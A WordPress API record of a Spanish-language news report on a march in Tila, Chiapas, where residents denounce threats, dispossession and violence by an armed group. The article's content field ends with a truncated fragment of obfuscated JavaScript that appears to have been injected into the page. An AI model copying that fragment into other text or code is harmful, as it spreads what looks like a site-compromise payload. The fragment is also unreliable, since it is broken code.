{"id":12739,"date":"2023-11-19T23:27:33","date_gmt":"2023-11-19T23:27:33","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12739"},"modified":"2023-11-19T23:27:34","modified_gmt":"2023-11-19T23:27:34","slug":"con-una-marcha-piden-paz-y-justicia-en-tila-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12739","title":{"rendered":"Con una marcha, piden paz y justicia en Tila, Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-19-at-12.14.34-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-12740\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-19-at-12.14.34-PM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-19-at-12.14.34-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-19-at-12.14.34-PM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/WhatsApp-Image-2023-11-19-at-12.14.34-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Habitantes del municipio de Tila, Chiapas, salieron a las calles este domingo, para exigir un alto a los hechos de violencia y amenazas, que sufren en aquel lugar, ante la presencia de un grupo armado ligado a los llamados \u201caut\u00f3nomos\u201d.\u201cDesde hace nueve a\u00f1os, hemos estado denunciando ante el gobierno sobre grandes injusticias y las constantes violaciones a los derechos humanos, y han hecho caso omiso de las denuncias. Hasta hoy en d\u00eda, hemos sido objeto de amenazas de muerte por parte de los l\u00edderes que se hacen llamar aut\u00f3nomos, junto con el brazo armado paramilitar Jos\u00e9 del Carmen (alias el quemado) que controla a los anexos de Sa\u00f1oja, Anexo Bravo, R\u00edo Grande, en coordinaci\u00f3n con los C. Lorenzo Jim\u00e9nez Ram\u00edrez, Jos\u00e9 \u00c1ngel P\u00e9rez L\u00f3pez\u201d, citan en un escrito.Durante un mitin, los asistentes vestidos y portando un globo del mismo color que simboliza la exigencia de paz, denunciaron que existe en ese municipio robo en diferentes modalidades, no solo de tiendas, sino hasta de veh\u00edculos y gasolina, para ser usados con fines delincuenciales.Hicieron saber que durante la presencia de miembros de la Guardia Nacional y Ej\u00e9rcito Mexicano, las cosas parecen marchar en paz y tranquilidad, pero cuando se retiran, regresan las agresiones, incluso &#8220;despojos de tierras, acahuales, solares, cafetales. Despojo de casas, cortes de luz el\u00e9ctrica, amenazas, emboscadas\u201d.\u201cEsta es nuestra voz que emerge de la necesidad de justicia, del dolor de las familias, de los hijos e hijas, tenemos derechos a la vida digna y humana, no queremos m\u00e1s violencia en nuestro pueblo y sus respectivos anexos\u201d, suscriben.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Habitantes del municipio de Tila, Chiapas, salieron a las calles este domingo, para exigir un alto a los hechos de violencia y amenazas, que sufren en aquel lugar, ante la presencia de un grupo armado ligado a los llamados \u201caut\u00f3nomos\u201d.\u201cDesde hace nueve a\u00f1os, hemos estado denunciando ante el gobierno &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12740,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12739","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12739","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12739"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12739\/revisions"}],"predecessor-version":[{"id":12741,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12739\/revisions\/12741"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12740"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12739"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12739"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12739"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}